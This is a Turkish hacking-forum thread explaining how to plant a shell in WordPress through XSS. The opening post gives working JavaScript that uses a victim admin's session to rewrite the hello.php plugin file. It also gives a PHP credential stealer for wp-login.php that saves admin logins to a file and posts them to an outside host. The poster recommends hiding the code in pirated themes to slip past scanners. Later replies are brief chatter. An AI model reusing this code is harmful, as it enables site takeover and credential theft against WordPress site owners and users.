Wordpress Xss İle Shell Sokma

Tahribat.com Forumları
line

Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
line

Wordpress Xss İle Shell Sokma

23/Şub/17 18:34 Kısayol Şikayet Özel Mesaj

EcHoLL

Kayıt Tarihi: 04/Eylül/2008

x=new XMLHttpRequest()
p='/wp-admin/plugin-editor.php?'
f='file=hello.php'
x.open('GET',p+f,0)
x.send()
$='_wpnonce='+/ce" value="([^"]*?)"/.exec(x.responseText)[1]+'&newcontent=<?php echo("Babagundi"); ?>&action=update&'+f
x.open('POST',p+f,1)
x.setRequestHeader('Content-Type','application/x-www-form-urlencoded')
x.send($)

yukarıdaki javascript kodunu xss olan açıktan admin abimize tıklattımız anda wordpress hello.php plugin dosyamıza shell kodunu açtırmış oluruz şimdi diyiceksiniz admin tıklıycakta falanda filanda der gibi oluyorsunuzdur warez temaların içine kodu eklediğiniz anda hiç bir script scannera takılmadan istedeğiniz dosyaya istediğiniz komutu yollarsınız Aşşadığdaki verdim kodu wp-login.php dosyasına eklersiniz admin login passını license.txt dosyasına eklemiş olursunuz.

if($_POST){

$userr = $_POST['log'];
$pww = $_POST['pwd'];

$subject = "SİTE:".$_SERVER["HTTP_HOST"]."";
$site = $_SERVER["HTTP_HOST"];

    $dosya_adi = "licence.txt";
    touch ("licence.txt") or die ("Dosya Yaratılamadı!") ;
    $dosya = fopen ('licence.txt' , 'a') or die ("Dosya açılamadı!");
    file_put_contents ($dosya_adi , ' Username:'.$userr.'
PW:'.$pww.'',FILE_APPEND);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://kekobabakeko.com/geldikeko.php");
curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_AUTOREFERER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'user' => $userr,
    'pw' => $pww,
    'site' => $site,
));
$result = curl_exec($ch);
curl_close($ch);

      $icerik = 'Usename: ' .$userr. '
   PW: ' .$pww. '
   Site:'. $_SERVER["HTTP_HOST"];

}

"Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.

Alıntı yap
23/Şub/17 18:35 Kısayol Şikayet Özel Mesaj

C_e_Z_a

Kayıt Tarihi: 30/Ağustos/2005

Herne kadar bu taraklarda bezim olmasa da, forumda türünün tek örneğisin vesselam hocam :)

Makaleyaz.Net - Türkiye'nin Makale Alım-Satım Platformu

Alıntı yap
23/Şub/17 18:42 Kısayol Şikayet Özel Mesaj

EcHoLL

Kayıt Tarihi: 04/Eylül/2008

Sağollasın kendini bu yolda geliştirmek isteyenler kullanır ben fikir atıyorum ortaya :D

"Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.

Alıntı yap
23/Şub/17 18:46 Kısayol Şikayet Özel Mesaj

Sigortacı
DJ_Alper

Kayıt Tarihi: 03/Ocak/2006

geçen wp sitelerimden birine girdim kullanıcılara bakayım dedim 4 tane yönetici kullanıcı vardı yönetici olarak atanmış sonra kullanıcı kaydına baktım kullanıcı kaydı abone olerak seçili

siteye iç birşey olmamış kod felan sokulmamış neyse sldim zaten otomatik update ediyo wp güncel yani anlamadım :D

Sorularınızı cilginsigortaci@gmail.com a yazabilirsiniz cevaplar instagram sayfasında >>>instagram/cilginsigortaci/ █║▌│█│║▌║││█║▌║▌║

Alıntı yap
23/Şub/17 18:50 Kısayol Şikayet Özel Mesaj

EcHoLL

Kayıt Tarihi: 04/Eylül/2008

DJ_Alper bunu yazdı

geçen wp sitelerimden birine girdim kullanıcılara bakayım dedim 4 tane yönetici kullanıcı vardı yönetici olarak atanmış sonra kullanıcı kaydına baktım kullanıcı kaydı abone olerak seçili

siteye iç birşey olmamış kod felan sokulmamış neyse sldim zaten otomatik update ediyo wp güncel yani anlamadım :D

temanda xss vardır yada biri admin şifreni araklamıştır

"Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.

Alıntı yap

Toplam Hit: 3177 Toplam Mesaj: 5
wordpress hack

Cevapla